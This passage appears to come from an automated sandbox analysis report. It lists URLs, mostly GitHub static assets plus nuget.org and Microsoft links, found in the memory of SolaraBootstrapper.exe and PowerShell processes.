                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/environment-4a62f2832289.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/error-add24e2c1056.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/github-cf4e90581e80.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/github-elements-221b0e7d77a3.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/global-fe6db6dfddd1.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-15a4cf222dbb.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/light-efd2f2257c96.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/light_colorblind-afcc3a6a38dd.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-79bca7145393.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/notifications-global-3ddac678adaf.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/primer-9f7b2e63c497.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/primer-primitives-8500c2c7ce5f.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/sessions-f096195f32d8.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/site-428f46b93a39.css
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_upd
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2009221d1
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_gith
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_anchored-posit
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-b0
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-no
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/assets/wp-runtime-9a56ebf061bf.js
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/favicons/favicon.png
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
                  Source: powershell.exe, 00000001.00000002.1718116672.0000000008B63000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.mic
                  Source: powershell.exe, 00000001.00000002.1705141692.000000000584A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1705141692.00000000059BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000001.00000002.1708078820.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1873584903.000001B390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2035739099.00000243405D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2242695799.000002DC7232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                  Source: SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://partner.github.com
